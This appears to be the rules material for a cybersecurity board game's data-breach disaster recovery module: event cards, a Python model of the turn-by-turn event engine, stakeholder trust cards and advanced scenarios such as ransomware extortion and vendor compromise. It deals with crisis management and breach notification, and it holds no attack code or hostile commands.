- Should have a communication plan
- CEO should be briefed
EVENT-03 Customer Notification Window
Scheduled: Turn 5
Type: Deadline checkpoint

Description: Counsel confirms customer notification should not wait any longer. Real-world laws require notification "without unreasonable delay" — in this game, the recommended deadline is end of Turn 5.

Resolution:
- If ACTION-09 (Customer Notification) is completed by end of Turn 5: no penalty. If it was framed transparently, +5 Reputation at final scoring.
- If not: Customer trust -10 now and at the start of each later turn until ACTION-09 is completed.
- Deferred consequence: if customers are never notified in-game, -15 Reputation at final scoring (the statutory notification window is missed after the game ends).
EVENT-09 Shareholder Pressure
Scheduled: Turn 5 (public companies only — skip for private companies)
Type: Governance

Description: Shareholder activists contact the board: demand explanations, threaten a proxy fight, and give interviews about leadership failure.

Resolution:
- If ACTION-12 (Board Communication) has been completed: Board trust -5 (pressure is absorbed)
- Otherwise: Board trust -15
EVENT-02 Regulatory 72h Deadline
Scheduled: Turn 6 (escalation begins; final deadline end of Turn 8)
Type: Deadline

Description: The GDPR-style 72-hour clock is running out. Regulators expect notification of the breach (ACTION-10) before the clock expires at end of Turn 8.

Resolution:
- If ACTION-10 (Regulatory Notification) is already completed: Regulator trust +5 (early, cooperative notification)
- If not: Regulator trust -10 now and at the start of each later turn (Turns 6, 7, 8) until ACTION-10 is completed.
- Deferred consequence: if regulators are never notified in-game, -20 Reputation at final scoring (deferred fine — GDPR fines run up to €20M or 4% of global turnover, whichever is HIGHER; narrative-only figure).
EVENT-12 Government Subpoena
Scheduled: Turn 7 (medium/large breaches — skip for small-scope games)
Type: Legal

Description: A subpoena arrives (FBI, state attorney general, or a congressional inquiry): turn over evidence, provide executive testimony, comply with the investigation.

Resolution:
- Budget -5 (legal fees; floor 0)
- Executive trust -10 (executives in the spotlight)
- Investigation +5% (compelled evidence-sharing accelerates fact-finding)

Opportunity: an independent investigation can validate a good-faith response; law enforcement may help recover evidence.
EVENT-05 Class Action
Trigger: ACTION-09 not completed by end of Turn 5, OR Customer trust below 20% at the start of any turn.
Type: Legal

Description: A law firm recruits customers and files a class action: "Jane Doe et al. vs. [Company Name]" — failure to protect data, failure to notify in a timely way, damages plus attorney fees.

Effects:
- Customer trust -15
- Board trust -10
- -10 Reputation at final scoring

Team Response: Cannot be undone — only mitigated by rebuilding trust for the rest of the game.
EVENT-06 Regulatory Fine
Trigger: Regulator trust below 20% at the start of any turn. (If regulators are never notified in-game, the deferred -20 Reputation from EVENT-02 applies at scoring instead — do not double-apply.)
Type: Regulatory

Description: A regulator announces a penalty for inadequate security and delayed cooperation.

Effects:
- Budget -10 (≈ $500K; floor 0)
- Board trust -10
- -10 Reputation at final scoring

Real-world scale (narrative-only): turnover-based regimes drive the largest penalties — GDPR fines can reach €20M or 4% of global turnover, whichever is HIGHER.
EVENT-07 Media Frenzy
Trigger: Media trust below 20% at the start of any turn, OR no Communication-category action completed by end of Turn 3.
Type: Communication

Description: Major outlets pick up the story: national coverage, "Massive Data Breach" headlines, social media amplification.

Effects:
- Media trust -20
- Customer trust -15
- Board trust -10

Team Response: ACTION-11 (Media Management) plus visible, transparent leadership.
EVENT-08 Second Breach
Trigger: At the start of Turn 6, Remediation is below 30% AND ACTION-07 (Rebuild) has not been completed.
Type: Escalation — once per game

Description: While responding to the first breach, investigators discover another compromised data store — the attacker maintained hidden persistence.

Effects:
- The game extends by +2 turns (once per game): play now runs to Turn 10. Scoring deadlines do NOT move — the regulatory deadline remains end of Turn 8.
- Investigation -30% (new breach invalidates part of your picture)
- Customer trust -20, Regulator trust -15, Media trust -10, Board trust -15
- Board releases +10 emergency Budget
- -10 Reputation at final scoring

Prevention: ACTION-07 (Rebuild), ACTION-04 (Third-Party IR), or strong Remediation progress by Turn 6.
EVENT-10 Competitor Advantage
Trigger: Customer trust below 40% at the start of Turn 5 or any later turn.
Type: Business

Description: A competitor launches a "Trust us with your data" campaign aimed at your customers.

Effects:
- Customer trust -10
- Budget -5 (lost revenue; floor 0)

Team Response: Customer communication and visible security improvements; trust can rebuild over the remaining turns.
EVENT-11 Executive Resignation
Trigger: Executive trust below 30% at the start of any turn.
Type: Internal

Description: A key executive (CISO, CTO, General Counsel, or CFO) resigns mid-crisis, citing "personal reasons" — really: "I don't trust this response."

Effects:
- Executive trust -10
- Board trust -10
- While Executive trust remains below 30%, the Justification bonus (optional +5% d20) is unavailable — leadership vacuum

Prevention: Regular internal communication, visible progress, board support.
| Event | Kind | Turn / Trigger | Core Effect |
|---|---|---|---|
| EVENT-01 First Media Coverage | Scheduled | Turn 2 | Media +5 if ACTION-11 done, else -10 |
| EVENT-04 Board Meeting | Scheduled | Turn 3 | Board +10 if ACTION-12 done, else -20 |
| EVENT-03 Customer Notification Window | Scheduled | Turn 5 | -10 Customer/turn if ACTION-09 late; never = -15 Rep |
| EVENT-09 Shareholder Pressure | Scheduled | Turn 5 (public co.) | Board -5 (prepared) or -15 |
| EVENT-02 Regulatory 72h Deadline | Scheduled | Turn 6 (deadline Turn 8) | -10 Regulator/turn while un-notified; never = -20 Rep |
| EVENT-12 Government Subpoena | Scheduled | Turn 7 (med/large) | Budget -5, Exec -10, Investigation +5% |
| EVENT-05 Class Action | Triggered | Customers un-notified after T5 or trust <20% | Cust -15, Board -10, -10 Rep |
| EVENT-06 Regulatory Fine | Triggered | Regulator trust <20% | Budget -10, Board -10, -10 Rep |
| EVENT-07 Media Frenzy | Triggered | Media <20% or silent through T3 | Media -20, Cust -15, Board -10 |
| EVENT-08 Second Breach | Triggered | T6: Remediation <30%, no rebuild | +2 turns (once), Inv -30%, trust hits, -10 Rep |
| EVENT-10 Competitor Advantage | Triggered | Customer trust <40% from T5 | Cust -10, Budget -5 |
| EVENT-11 Executive Resignation | Triggered | Executive trust <30% | Exec -10, Board -10, no Justification bonus |
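The setup and turn procedure above, together with the twelve event cards in this deck, describe a small deterministic state machine, which is useful to have in executable form when balance-testing the clock. The following Python model is an added example written for this page; it is not part of the Incident Zero kit. It encodes the scheduled events at their printed turns, the triggered events checked at the start of every turn, the once-per-game rule, the non-stacking Customer decay / EVENT-03 penalty, the trust and Budget clamps, the EVENT-08 extension, and the deferred scoring consequences. Dice rolls, action costs and the action cards' own trust gains are deliberately not modelled: a play is recorded only as "ACTION-xx completed on turn N". Three things are assumptions rather than card text: the Communication category is taken to be ACTION-09/10/11/12 plus the free Holding Statement (written as `HOLDING-STATEMENT`); triggered events are checked in the order they appear in this deck (05, 06, 07, 08, 10, 11); and EVENT-03's "-10 now and each later turn" is read against the end-of-Turn-5 deadline in the deadlines table, so the penalty begins at the start of Turn 6.

```python
"""Model of the Disaster Recovery module's event engine on the v2.2 clock.
Scheduled events resolve at their printed turn, triggered events are checked at the
start of every turn, each fires once, trust clamps to 0-100 and Budget floors at 0."""
from dataclasses import dataclass, field

# Assumption: Communication category = the four notification/PR actions + free Holding Statement.
COMMUNICATION = {"ACTION-09", "ACTION-10", "ACTION-11", "ACTION-12", "HOLDING-STATEMENT"}


@dataclass
class Game:
    public_company: bool = True
    large_breach: bool = True
    trust: dict = field(default_factory=lambda: {"Customers": 50, "Regulators": 60, "Media": 40, "Board": 70, "Executives": 80})
    budget: int = 50
    investigation: int = 0
    remediation: int = 0
    reputation: int = 0                              # event hits applied at final scoring
    final_turn: int = 8
    completed: dict = field(default_factory=dict)    # action id -> turn completed
    fired: dict = field(default_factory=dict)        # event id -> turn it fired
    collapsed_turn: int = 0                          # 0 = company still standing

    def adjust(self, who, delta):
        self.trust[who] = max(0, min(100, self.trust[who] + delta))

    def spend(self, amount):
        self.budget = max(0, self.budget - amount)

    def done_by(self, action, turn):
        return self.completed.get(action, 99) <= turn

    def fire(self, event, turn, *effects):
        self.fired[event] = turn
        for who, delta in effects:
            self.adjust(who, delta)

    def start_of_turn(self, turn):
        # Step 1: scheduled events placed on this turn.
        if turn == 2:   # EVENT-01 First Media Coverage
            self.fire("EVENT-01", turn, ("Media", 5 if self.done_by("ACTION-11", 1) else -10))
        if turn == 3:   # EVENT-04 Board Meeting
            self.fire("EVENT-04", turn, ("Board", 10 if self.done_by("ACTION-12", 2) else -20))
        if turn == 5:   # EVENT-03 revealed (penalty below); EVENT-09 for public companies only
            self.fire("EVENT-03", turn)
            if self.public_company:
                self.fire("EVENT-09", turn, ("Board", -5 if "ACTION-12" in self.completed else -15))
        if turn == 6:   # EVENT-02 Regulatory 72h Deadline
            self.fire("EVENT-02", turn, ("Regulators", 5 if "ACTION-10" in self.completed else 0))
        if turn == 7 and self.large_breach:   # EVENT-12 Government Subpoena
            self.fire("EVENT-12", turn, ("Executives", -10))
            self.spend(5)
            self.investigation = min(100, self.investigation + 5)
        # Per-turn escalations: EVENT-02 regulator penalty (Turns 6-8); customer decay and EVENT-03 never stack.
        if 6 <= turn <= 8 and "ACTION-10" not in self.completed:
            self.adjust("Regulators", -10)
        silent = turn >= 3 and not (COMMUNICATION & set(self.completed))
        late_notice = turn >= 6 and "ACTION-09" not in self.completed   # assumption: penalty from Turn 6
        if silent or late_notice:
            self.adjust("Customers", -10)
        # Step 2: un-fired triggered events whose condition is now met, in deck order (assumption).
        t = self.trust
        if "EVENT-05" not in self.fired and ((turn >= 6 and not self.done_by("ACTION-09", 5)) or t["Customers"] < 20):
            self.fire("EVENT-05", turn, ("Customers", -15), ("Board", -10))
            self.reputation -= 10
        if "EVENT-06" not in self.fired and t["Regulators"] < 20:
            self.fire("EVENT-06", turn, ("Board", -10))
            self.spend(10)          # its -10 Reputation is settled in final_scoring()
        if "EVENT-07" not in self.fired and (t["Media"] < 20 or (turn >= 4 and not any(self.done_by(a, 3) for a in COMMUNICATION))):
            self.fire("EVENT-07", turn, ("Media", -20), ("Customers", -15), ("Board", -10))
        if "EVENT-08" not in self.fired and turn == 6 and self.remediation < 30 and "ACTION-07" not in self.completed:
            self.fire("EVENT-08", turn, ("Customers", -20), ("Regulators", -15), ("Media", -10), ("Board", -15))
            self.final_turn = 10    # +2 turns, once; scoring deadlines do not move
            self.investigation = max(0, self.investigation - 30)
            self.budget += 10       # board releases emergency Budget
            self.reputation -= 10
        if "EVENT-10" not in self.fired and turn >= 5 and t["Customers"] < 40:
            self.fire("EVENT-10", turn, ("Customers", -10))
            self.spend(5)
        if "EVENT-11" not in self.fired and t["Executives"] < 30:
            self.fire("EVENT-11", turn, ("Executives", -10), ("Board", -10))
        if min(t.values()) == 0 and not self.collapsed_turn:
            self.collapsed_turn = turn   # v2.2 single loss rule: any meter at 0%

    def final_scoring(self):
        rep = self.reputation - (0 if self.done_by("ACTION-09", 8) else 15)
        if not self.done_by("ACTION-10", 8):
            rep -= 20   # deferred fine replaces EVENT-06's -10 (no double-apply)
        elif "EVENT-06" in self.fired:
            rep -= 10
        return rep


def simulate(plays, public_company=True, large_breach=True):
    """plays: {turn: [action ids completed during that turn]}; stops on collapse."""
    g = Game(public_company, large_breach)
    turn = 1
    while turn <= g.final_turn and not g.collapsed_turn:
        g.start_of_turn(turn)
        for action in plays.get(turn, []):
            g.completed.setdefault(action, turn)
        turn += 1
    return g
```

Two constructed scripts illustrate the clock. `simulate({})`, a team that completes nothing, draws EVENT-07 at Turn 4 (silent through Turn 3) and collapses at Turn 5 when the Customer decay, EVENT-05 and EVENT-10 drive the Customer meter to 0%. `simulate({1: ["ACTION-11"], 2: ["ACTION-12"], 3: ["ACTION-10"], 4: ["ACTION-09"], 5: ["ACTION-07"]})` reaches Turn 8 with every meter above its start except Executives (EVENT-12), and with no deferred penalties; drop ACTION-07 from that script and EVENT-08 extends the game to Turn 10 while the Turn-8 regulatory deadline stays put.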
| Deadline | Turn | If missed |
|---|---|---|
| Internal legal/executive escalation | End of Turn 2 | Narrative only (relabeled from the old "12-hour regulatory deadline" — the regulatory anchor is GDPR 72h) |
| Customer notification (ACTION-09) recommended | End of Turn 5 | Customer trust -10/turn; EVENT-05 may trigger; never notified = -15 Reputation at scoring |
| Ransom decision (ACTION-13) | Start of Turn 5 (default; +2 turns if NEGOTIATE) | Treated as REFUSE; data-publication event fires |
| Regulatory notification (ACTION-10) | End of Turn 8 (escalating from Turn 6) | Regulator trust -10/turn from Turn 6; never notified = -20 Reputation at scoring |
Former "30-day"/"60-day" deadlines from v2.1 are re-expressed as the deferred final-scoring consequences above — they no longer exist as separate timers.
Standard 8-Turn Disaster Recovery Game:
| Turn | Scheduled Event | Typical Focus |
|---|---|---|
| 1 | — | Investigate, contain |
| 2 | First Media Coverage | Investigation, media prep |
| 3 | Board Meeting | Board briefed, regulators notified early |
| 4 | — | Remediation |
| 5 | Customer Notification Window + Shareholder Pressure | Customer notification, ransom decision |
| 6 | Regulatory 72h Deadline (escalation begins) | Regulators notified (if not already), remediation |
| 7 | Government Subpoena | Final remediation, communication |
| 8 | — (game ends at +72h) | Wrap-up actions, final scoring |
Disaster Recovery Module: Event Timeline Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/disaster-recovery/core-deck/stakeholder-cards.md
Version: 2.2 - Playtest Edition Last Updated: October 2025
Stakeholder Cards represent the key groups affected by a data breach. Each stakeholder has a trust/satisfaction level (0-100%) that changes based on team actions. Stakeholders can escalate if not managed (triggering Events and budget costs).
All older thresholds ("<30% trust = loss", "keep above 30/40/50 to win") are removed in v2.2.
Stakeholder: Customers
Stakeholder Type: External
Primary Concern: Data privacy and service availability
Trust Meter: Starts at 50%
Decay (v2.2): From Turn 3 onward, if the team has completed no Communication-category action (the free Holding Statement counts), Customer trust -10 at the start of each turn. This does not stack with the Turn-5 notification penalty (EVENT-03) — apply one, not both, per turn. Below 20% = CRITICAL warning state (may trigger EVENT-05).

Description: The customers whose data was breached. They want to know:
- What data was accessed
- Whether it was encrypted
- What they should do (change password, watch credit)
- Whether the company is protecting them
- Whether to switch providers

Behavior:
- High Trust (70%+): Continue using service, minor PR impact
- Medium Trust (40-70%): Some customer loss, but company is "handling it"
- Low Trust (<40%): Customer exodus, lawsuits, regulatory investigation
- Critical (<20%): Mass churn, bankruptcy risk, acquisition/collapse

What Affects Trust:
- Increases Trust:
  - Customer Notification (ACTION-09): +15%
  - Public statement about patch/fix: +5%
  - Free credit monitoring offer: +10%
  - Quick response time: +5% per turn if investigating

Goal:
- Ideally maintain above 50% for a positive outcome (trust feeds the final Reputation computation)

Loss (v2.2 single rule):
- Customer trust at 0% = company collapses (immediate loss)
- Narrative: mass churn, lawsuits, bankruptcy/acquisition

Crisis Actions That Help:
- ACTION-09 (Customer Notification): +15% trust
- ACTION-11 (Media Management): +10% trust
- Any remediation action that shows progress: +2-5%

Special Events:
- If trust drops too low, class action lawsuit filed (see Event Cards)
- If trust stays high, customer retention and recovery possible
- Media coverage affects customer trust (see Stakeholder: Media)
Stakeholder: Regulators
Stakeholder Type: Government/Legal
Primary Concern: Compliance with breach notification laws
Trust Meter: Starts at 60%
Escalation (v2.2): If ACTION-10 is not completed, Regulator trust -10 at the start of each turn from Turn 6 (see EVENT-02). Below 20% = CRITICAL warning state (triggers EVENT-06 Regulatory Fine).

Description: Government agencies that regulate data privacy:
- State attorneys general (breach notification laws)
- Federal regulators (healthcare, financial, etc.)
- International regulators (GDPR if any EU customers)
- Law enforcement (FBI, Secret Service)

Behavior:
- High Confidence (70%+): Voluntary cooperation, no penalties
- Medium Confidence (40-70%): Investigation, possible fines
- Low Confidence (<40%): Aggressive investigation, significant fines
- Critical (<20%): Criminal prosecution, company shut down

What Affects Regulatory Confidence:
- Increases Confidence:
  - Regulatory Notification (ACTION-10): +20%
  - Prompt customer notification: +10%
  - Third-party incident response (ACTION-04): +15%
  - Forensics evidence: +10%
  - Proactive remediation: +5%

Regulatory Requirements Vary (real-world flavor; the in-game clock is GDPR 72h = end of Turn 8):
- GDPR (EU): Notify supervisory authority within 72 hours; fines up to €20M or 4% of global turnover, whichever is HIGHER
- California: Notify without unreasonable delay; CCPA statutory damages fuel class actions
- HIPAA: Notification within 60 days (healthcare)
- Sector-Specific: Finance, healthcare have stricter rules

Goal:
- Maintain regulatory confidence above 50%
- Comply with the Turn-8 notification requirement

Loss (v2.2 single rule):
- Regulator trust at 0% = company collapses (immediate loss)
- Narrative: crippling fines, criminal prosecution, license revoked

Crisis Actions That Help:
- ACTION-10 (Regulatory Notification): +20% confidence
- ACTION-04 (Third-party IR): +15% confidence
- ACTION-05, ACTION-07 (Remediation): +5-10%

Special Events:
- If notification deadline missed: Regulatory Penalty Event
- If confidence drops too low: Fine Assessment Event
- If properly handled: Regulatory Cooperation Event (reduced penalties)
Stakeholder: Media
Stakeholder Type: External / Communication
Primary Concern: Newsworthy story (bigger = bigger problem)
Trust Meter: Starts at 40% (media is naturally skeptical)
Escalation: Escalates based on company response quality

Description: Media outlets, journalists, bloggers, social media. Media decides whether breach is:
- Small tech story (1 article)
- Major business news (multiple outlets, days)
- National news (major outlets, weeks)
- International scandal (global coverage)

Behavior:
- Positive Coverage (70%+): "Company handled breach well", trust maintained
- Neutral Coverage (40-70%): Matter-of-fact reporting, some concern
- Negative Coverage (<40%): "Company slow to respond", "Cover-up suspected"
- Scandal (<20%): Major negative coverage, "Company failed customers"

What Affects Media Coverage:
- Positive Factors:
  - Proactive media statement (ACTION-11): +20%
  - Quick notification (customers notified by end of Turn 5): +15%
  - CEO takes responsibility: +10%
  - Transparent communication: +10%
  - Third-party validation: +5%

Media Impact on Business:
- Positive media → customers stay, suppliers trust company
- Negative media → customers leave, stock price drops, suppliers question
- Scandal media → business collapse possible, bankruptcy risk

Goal:
- Maintain media trust above 40%
- Frame narrative as "company handled responsibly"
- Minimize negative coverage (below 20% = CRITICAL warning; triggers EVENT-07)

Loss (v2.2 single rule):
- Media trust at 0% = company collapses (immediate loss)
- Narrative: negligence narrative sticks, stock crash, consumer boycott

Crisis Actions That Help:
- ACTION-11 (Media Management): +20% coverage
- ACTION-09 (Customer Notification): +5% (transparency)
- ACTION-12 (Board Communication): +5% (if credible)

Special Events:
- If company is silent: "Media Frenzy" Event (increased coverage)
- If company responds well: "Positive Coverage" Event (mitigates damage)
- If executives hide: "Cover-up Narrative" Event (major damage)
Stakeholder: Board
Stakeholder Type: Internal / Governance
Primary Concern: Company liability and fiduciary duty
Trust Meter: Starts at 70% (board is inherently supportive initially)
Escalation: Drops if response is inadequate; may fire CEO

Description: Board of directors (and C-level executives if private company). Board must:
- Fulfill fiduciary duty to shareholders
- Authorize major spending (crisis response can be very expensive)
- Decide on disclosure (SEC rules if public)
- Decide on executives' future (fire/retain CEO)
- Manage shareholder relationships

Behavior:
- High Confidence (70%+): Board is supportive, authorizes spending, defends executives
- Medium Confidence (40-70%): Board is questioning, scrutinizes spending, considers changes
- Low Confidence (<40%): Board is critical, may fire CEO, considers restructuring
- Critical (<20%): Board votes to remove management, sell company, or file bankruptcy

What Affects Board Confidence:
- Increases Confidence:
  - Board Notification (ACTION-12): +20%
  - Professional incident response: +15%
  - Quick containment: +10%
  - Good regulatory relationship: +10%
  - Transparent communication: +5%

Board Decision Points (v2.2 clock):
- Turn 3: Board Meeting (EVENT-04; ACTION-12 should be done before it)
  - Board decides if CEO retains confidence
  - Major spending approvals (forensics, lawyers, PR)
  - Disclosure decisions
- Restructuring discussions
- Turn 8: End-game assessment

Goal:
- Maintain board confidence above 50%
- Board authorizes necessary spending
- Executives retain their positions (below 20% = CRITICAL warning state)

Loss (v2.2 single rule):
- Board trust at 0% = company collapses (immediate loss)
- Narrative: CEO fired, forced sale, bankruptcy filing

Crisis Actions That Help:
- ACTION-12 (Board Notification): +20% confidence
- ACTION-04 (Third-party IR): +15% (shows professional response)
- ACTION-01, ACTION-07 (Forensics/Rebuild): +5-10%

Special Events:
- Turn 3: Board Meeting Event (first assessment)
- If confidence drops low: "CEO Removed" Event (new CEO, game becomes harder)
- If well-managed: "Board Confidence Maintained" Event (positive modifier)
Stakeholder: Executives
Stakeholder Type: Internal / Management
Primary Concern: Job security and company survival
Trust Meter: Starts at 80% (executives are naturally supportive initially)
Escalation: Drops if response is chaotic; may resign or sabotage

Description: C-level executives (CEO, CTO, CFO, CISO, General Counsel) who must:
- Make critical decisions under pressure
- Coordinate crisis response
- Handle media inquiries
- Present to board
- Ensure company continues operating
- Manage their own careers/reputations

Behavior:
- High Morale (70%+): Executives are focused, coordinated, decisive
- Medium Morale (40-70%): Executives are stressed, some disagreements, slower decisions
- Low Morale (<40%): Executives may resign, infighting, poor decisions
- Critical (<20%): Executive exodus, chaos, no leadership

What Affects Executive Morale:
- Increases Morale:
  - Clear incident response plan: +15%
  - Professional guidance (consultants): +10%
  - Regular communication/updates: +5% per turn
  - Board support: +10%
  - Progress on containment: +5%

Executive Departures Risk:
- If morale drops too low, key executives resign
- Each resignation removes their expertise from future decisions
- Replacement executives are less effective initially
- Crisis becomes harder to manage

Goal:
- Maintain executive morale above 50%
- Prevent key executive resignations (below 30% triggers EVENT-11; below 20% = CRITICAL warning state)
- While Executive trust is below 30%, the Justification bonus is unavailable (see EVENT-11)

Loss (v2.2 single rule):
- Executive trust at 0% = company collapses (immediate loss)
- Narrative: executive exodus, leadership vacuum, chaos

Crisis Actions That Help:
- Regular communication: +5% per turn
- Professional response team: +10%
- Regulatory/customer progress: +5%
- Board confidence: +10%

Special Events:
- If morale drops low: "Executive Resignation" Event (key person leaves)
- If morale stays high: "Leadership United" Event (positive coordination bonus)
- Media attacks on executives: Morale drop (-10%)
| Stakeholder | Type | Start Trust | Critical Warning | Primary Actions |
|---|---|---|---|---|
| Customers | External | 50% | <20% | ACTION-09 (notify), ACTION-11 (PR) |
| Regulators | Government | 60% | <20% | ACTION-10 (notify), ACTION-01/04 (forensics) |
| Media | External | 40% | <20% | ACTION-11 (PR), ACTION-09 (transparency) |
| Board | Internal | 70% | <20% | ACTION-12 (notify), ACTION-04 (guidance) |
| Executives | Internal | 80% | <20% (resignations from <30%) | Regular communication, success indicators |
Reminder (v2.2): critical is a warning state only. The single loss condition is any trust meter at 0%. Meters clamp to 0-100%.
Teams must balance managing five competing stakeholder groups:
Prioritization Strategy 1: External First
- Focus on Customers and Media
- Maintain public trust
- Regulators will follow
- Risk: Internal management gets neglected

Prioritization Strategy 2: Internal First
- Focus on Board and Executives
- Maintain leadership confidence
- Internal team makes better decisions
- Risk: External stakeholders (customers, media) get neglected

Prioritization Strategy 3: Balanced
- Do some actions for each stakeholder group
- Distribute budget across all notifications
- More complex but sustainable
- Risk: Medium progress on all, complete on none

Prioritization Strategy 4: Targeted
- Identify critical stakeholder (maybe regulators)
- Focus budget there
- Neglect others
- Risk: Single stakeholder collapse

Stakeholders influence each other:
- Media → Customers: If media says "company hid breach", customers distrust (stack penalties)
- Regulators → Customers: If regulator fines company, customers see company as unsafe
- Board → Executives: If board removes CEO, executives lose confidence
- Executives → Board: If executives resign, board loses confidence in response
- Customers → Stock Price: If customer trust drops, stock price drops (affects Board decisions)
Each stakeholder's escalation matches a Triggered Event (see Event Cards — those are the authoritative conditions):
Disaster Recovery Module: Stakeholder Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/disaster-recovery/expansion-deck/advanced-scenarios.md
Version: 2.2 - Playtest Edition Last Updated: October 2025
Advanced Scenario Cards extend the Disaster Recovery module with sophisticated, multi-faceted crisis situations that challenge experienced crisis management teams.
How scenarios work (v2.2): each scenario is played with the standard core rules — same 8-turn clock, same Action/Event/Stakeholder cards, same scoring. A scenario adds its "Special Events" as extra Scheduled events on the timeline at setup, and applies its concrete Difficulty (v2.2) effects (listed per scenario, replacing the old percentage "difficulty multipliers"). The only mechanical layers are the Special Events and the Difficulty block; "Cost Implications" sections are narrative color for the debrief. Dollar figures are narrative-only unless converted at 1 Budget ≈ $50K.
Complexity: ADVANCED
Affected Regions: US + EU + Asia
Primary Challenge: Different legal requirements for different regions

Description: Breach affects customer data in multiple countries with different privacy laws:
- US (California): notify without unreasonable delay; CCPA statutory damages fuel class actions
- EU (GDPR): 72-hour notification deadline; fines up to €20M or 4% of global turnover, whichever is HIGHER
- Asia (varies): Different deadlines and requirements in each country

Data residency requirements mean:
- EU customer data cannot be transferred to US servers
- Forensics must happen in country where data is stored
- Different regulators in each country demand investigation
- Different notification laws require different messages

Key Complications:
- Timeline Conflict: EU regulators demand notification faster than the domestic clock; US requires notification without unreasonable delay; Asia varies
- Legal Conflict: EU GDPR vs. US lawful intercept (conflicting requirements)
- Investigation: Must conduct forensics in multiple jurisdictions simultaneously
- Costs: Multi-region response = much higher costs

Team Decision Points:
1. Which region to prioritize (cannot satisfy all simultaneously)
2. How to conduct forensics across jurisdictions
3. How to notify customers differently per region
4. How to handle conflicting regulatory requirements

Special Events (added to the timeline at setup):
- Turn 2: EU regulators demand notification — a second ACTION-10 play (EU filing) is due by end of Turn 4
- Turn 5: International regulators demand investigation coordination (Regulator trust -5 if Investigation is below 25%)
- Turn 6: Data residency complication — if the EU filing was missed, Regulator trust -10 per turn (in place of, not stacked with, the core EVENT-02 escalation)

Cost Implications:
- Multi-region legal and forensics overhead: see Difficulty below
- Regulatory fines can stack across jurisdictions (narrative-only)
- Notification costs: translations, different templates, regulatory filings

Team Response:
- Must prioritize regions (satisfy EU first due to timeline)
- Must engage local lawyers in each jurisdiction
- Must conduct compliant investigation (following local laws)
- Communication % must advance faster than usual

Difficulty (v2.2):
- All Communication advances -5% (multi-jurisdiction overhead; minimum +5%)
- A second regulator notification (EU) is required by end of Turn 4 (ACTION-10 played twice this game)
- Set aside 5 Budget at setup as a translation/filing reserve (unavailable for actions)
Complexity: ADVANCED
Attacker Demand: $10M ransom or threaten to sell/publish data
Primary Challenge: Responding to extortion threats

Description: Attacker not only encrypted data but also stole data and threatens public disclosure:
- "Pay up or we publish 50GB of customer PII on dark web" (demand ≈ 20 Budget; narrative "$10M" for a large enterprise)
- Attacker provides proof of data access (sample files)
- Extortion email sent to CEO and board
- Attacker sets the deadline at the start of Turn 5 (the core ACTION-13 ransom deadline)

Key Complications:
- Payment Question: Pay ransom or not?
  - Paying: Funding criminal enterprise, no guarantee of data deletion
  - Not paying: Risk of data publication (massive PR disaster)
- Disclosure Dilemma: Tell customers about extortion threat?
  - Yes: Customers fear data will be published
  - No: If data is published, looks like cover-up
- Law Enforcement: FBI recommends not paying (incentivizes more attacks)
- Backup Reliance: Can you recover without paying?

Timeline Pressure (Special Events added at setup):
- Turn 1: Extortion email; ransom deadline set at start of Turn 5
- Turn 2: First partial data publication (attacker shows they have data): Media trust -5
- Turn 3: Attacker lowers price (negotiation attempt; pure roleplay — ACTION-13 costs are unchanged)
- Turn 5: Deadline reached — resolve ACTION-13 as printed (publish if unpaid; +2 turns if NEGOTIATE)

Financial Dilemma:
- Ransom: payment may violate OFAC sanctions if the actor is sanctioned; many insurers restrict or exclude ransom coverage
- Recovery from backup: Slow (if backups exist)
- Data publication: Regulatory fines + lawsuits (potentially $50M+ liability; narrative-only)
- Public disclosure: Stock price crash, customer loss

Team Decisions:
1. Pay ransom? (Risk: Encourages future attacks, no guarantee)
2. Attempt to recover from backup? (Risk: Slow recovery, data loss)
3. Notify customers before/after data publication? (Risk: Either way is bad)
4. Notify regulators? (Required, but shows full extent of damage)

Law Enforcement Engagement:
- FBI may take over investigation (federal crime)
- Reduces team's control of situation
- May recommend decoy ransom negotiation (catch attacker)
- Investigation may take weeks (slow response)

Special Events (added to the timeline at setup):
- Turn 3: Media discovers extortion threat ("CEO held for ransom"): Media trust -10
- Turn 4: Attacker releases more sample data: Customer trust -5

Cost Implications:
- Ransom: 20 Budget if paid (ACTION-13 PAY, as printed)
- FBI coordination and extortion-specific notification overhead: see Difficulty below
- Regulatory fines if data published: narrative-only (GDPR-scale)

Difficulty (v2.2):
- Remediation advances are halved until ACTION-13 is declared (operational paralysis while the decision hangs)
- Use ACTION-13 exactly as printed; the ransom deadline is start of Turn 5
Complexity: ADVANCED
Vector: Breach compromises customers' data at YOUR company's data store
Primary Challenge: Managing responsibility for vendor compromise

Description: Investigation reveals attacker didn't target your company directly—they compromised a vendor you use:
- Your company uses cloud storage vendor (e.g., competitor to AWS)
- That vendor was breached
- Attacker gained access to YOUR customer data stored at vendor
- Question: Who is responsible? You? Vendor? Both?

Key Complications:
- Liability Question:
  - You're liable to customers (you selected vendor)
  - Vendor is liable (their security failure)
  - Customers might sue both
- Vendor Response:
  - Vendor may be uncooperative (deny liability)
  - Vendor may be bankrupt (vendor company collapse during breach)
  - Vendor may not investigate properly
- Notification Question:
  - Tell customers you chose bad vendor?
  - Or just notify about data breach without explaining vendor?
  - Either way looks bad
- Investigation:
  - Must investigate vendor (not your own systems)
  - Vendor may not cooperate
  - Limited forensic access (you don't control vendor systems)
  - Regulatory agencies may blame you anyway

Responsibility & Liability:
- Customer lawsuits: "You failed to vet vendor properly"
- Regulatory fines: "You failed to oversee third-party risk"
- Vendor lawsuits: "Vendor refuses to pay damages"
- Vendor bankruptcy: "Vendor can't pay, customers turn to you"

Team Decisions:
1. Blame vendor (legally risky, looks bad)
2. Share responsibility (legally safer, but costs more)
3. Quickly terminate vendor relationship (looks reactive)
4. Demand vendor pay for notification/remediation (vendor may refuse)

Special Events:
- Turn 1: Discovery that vendor was breached
- Turn 2: Vendor denies liability / claims it's your responsibility
- Turn 3: Regulatory agency demands to know vendor details
- Turn 4: First customer lawsuit against both you AND vendor
- Turn 5: Vendor declares bankruptcy (can't pay damages)

Cost Implications:
- Investigation into vendor: +8 Budget (forensics at vendor site)
- Legal: +20 Budget (defending against liability claims)
- Regulatory fines: Potentially full amount (you're still liable)
- Customer lawsuits: Likely regardless of vendor's role
- Vendor transition: +15 Budget (switch to new vendor, migrate data)

Communication Challenge:
- Customers angry at you (you chose bad vendor)
- Media: "Company failed to vet third-party security"
- Regulatory: "Poor third-party risk management"
- Board: "Why did we use this vendor?"

Difficulty (v2.2):
- Investigation advances -5% (no direct access to vendor systems; minimum +5%)
